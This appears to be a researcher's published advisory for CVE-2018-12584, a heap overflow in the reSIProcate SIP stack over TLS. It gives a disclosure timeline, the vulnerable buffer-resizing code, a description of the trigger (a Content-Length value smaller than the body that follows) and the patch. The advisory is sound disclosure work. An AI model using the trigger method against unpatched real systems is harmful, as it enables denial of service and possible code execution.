Heap overflow vulnerability in reSIProcate through 1.10.2 | Joachim De Zutter
CVE ID: CVE-2018-12584
References: bugs.debian.org security-tracker.debian.org bugzilla.redhat.com
securityfocus.com seclists.org us-cert.gov canonical.com cvedetails.com packetstormsecurity.com

TIMELINE

    Bug report with test code sent to main reSIProcate developers: 2018-06-15
    Patch created by Scott Godin: 2018-06-18
    CVE ID assigned: 2018-06-19
    Patch committed to reSIProcate repository: 2018-06-21
    Advisory first published on website: 2018-06-22
    Advisory sent to Bugtraq mailing list: 2018-08-08

DESCRIPTION

A heap overflow can be triggered in the reSIProcate SIP stack when TLS is enabled.
Abuse of this vulnerability may cause a denial of service of software using reSIProcate and may
also lead to remote code execution.
No SIP user authentication is required to trigger the vulnerability on the client or server side.

TECHNICAL DETAILS

The file resiprocate/resip/stack/ConnectionBase.cxx contained the following code fragment:

bool
ConnectionBase::preparseNewBytes(int bytesRead)
{
/* ... */
         else if (mBufferPos == mBufferSize)
         {
            // .bwc. We've filled our buffer; go ahead and make more room.
            size_t newSize = resipMin(mBufferSize*3/2, contentLength);
            char* newBuffer = 0;
            try
            {
               newBuffer=new char[newSize];
            }
            catch(std::bad_alloc&)
            {
               ErrLog(>>"Failed to alloc a buffer while receiving body!");
               return false;
            }
            memcpy(newBuffer, mBuffer, mBufferSize);
            mBufferSize=newSize;
            delete [] mBuffer;
            mBuffer = newBuffer;
         }
/* ... */
}

Execution of the code above could be triggered by sending a partial SIP message over TLS with a
Content-Length header field, followed by sending a packet over TLS with its associated SIP
message body. By setting the Content-Length field to a value that is lower than the length
of the SIP message body which followed, a malicious user could trigger a heap buffer overflow.

The bug did not appear to be reproducible using TCP instead of TLS even when the TCP packets
were sent with delays between them.

TEST CODE

A Python script can be used to test the vulnerability of both server and client
software based on reSIProcate.

EXPLOITABILITY

At CVE-2018-12584-exploitability.html
the exploitability of an affected version of repro on Windows XP Professional with
Service Pack 3 was examined, it was separated from this text because AVG Web Shield
considered the text to be a threat.

SOLUTION

A patch was created by Scott Godin, it was committed to the reSIProcate repository at

https://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608

For Debian 8 "Jessie", CVE-2018-12584 and CVE-2017-11521 have been fixed in resiprocate package
version 1:1.9.7-5+deb8u1 (https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html)

In the Zoiper softphone library the bug was fixed since 30th of March 2018,
and the official patch from the reSIProcate repository was merged on 26th of June 2018.

DISCLAIMER

The information in this report is believed to be accurate at the time of publishing based on
currently available information.
Use of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the author nor the publisher
accepts any liability for any direct, indirect, or consequential loss or damage arising from
use of, or reliance on, this information.